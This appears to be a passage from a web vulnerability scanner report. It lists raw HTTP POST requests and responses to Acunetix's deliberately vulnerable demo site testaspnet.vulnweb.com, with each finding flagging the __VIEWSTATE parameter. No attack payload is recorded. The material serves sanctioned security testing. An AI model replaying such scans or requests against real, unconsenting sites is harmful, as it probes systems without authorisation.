Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8223&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAsqKrX9oIZGRkHkUGKrk8wqHb9vsdIoL9dJRYWl8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLlmJytAQK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8YJghtPk09xfmmUuYKhg%2BPeiHNuw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:09:14 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAsqKrX9oIZGRkHkUGKrk8wqHb9vsdIoL9dJRYWl8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLlmJytAQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8YJghtPk09xfmmUuYKhg+PeiHNuw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:White" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8227&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAWUzQYtoIZGRkpIiBDS3U2jYlG1%2FrWFSGHXVg3Ts%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKUwKjwCgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8uiLNbe91%2FOJ0uzQI8o%2FpKTME9Lw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:20:55 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgCAWUzQYtoIZGRkpIiBDS3U2jYlG1/rWFSGHXVg3Ts=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKUwKjwCgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8uiLNbe91/OJ0uzQI8o/pKTME9Lw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:White" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1135 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
